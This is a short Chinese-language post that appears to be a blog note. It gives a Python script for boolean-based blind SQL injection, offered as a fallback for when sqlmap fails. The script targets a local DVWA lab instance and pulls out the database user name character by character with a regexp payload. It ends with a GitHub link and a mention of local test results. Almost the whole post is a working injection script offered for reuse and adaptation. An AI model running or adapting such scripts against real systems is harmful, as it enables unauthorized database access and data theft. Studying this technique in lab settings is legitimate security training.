各种原因,可能导致sqlmap跑不出来,这个时候,自己写脚本就派上用场了,这里写了个简单的脚本,脚本内容是跑user,需要可以自己改。
import requests def GetQ(): pd = '' payload = '0123456789abcdefghijklmnopqrstuvwxyz!_@%' for i in range(30): for p in payload: url = "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27%20and%20user()%20regexp%20%27^{}%27 and 'j'like'j&Submit=Submit#".format(pd+p) headers = {"Cookie":"security=low; PHPSESSID=65cba547699cda5ab206c6693735c8c6"} get = requests.get(url,headers=headers) if 'Surname' in get.content: # print p pd+=p print pd GetQ()
https://github.com/Jumbo-WJB/notes/blob/master/bool_sqli.py
本地测试结果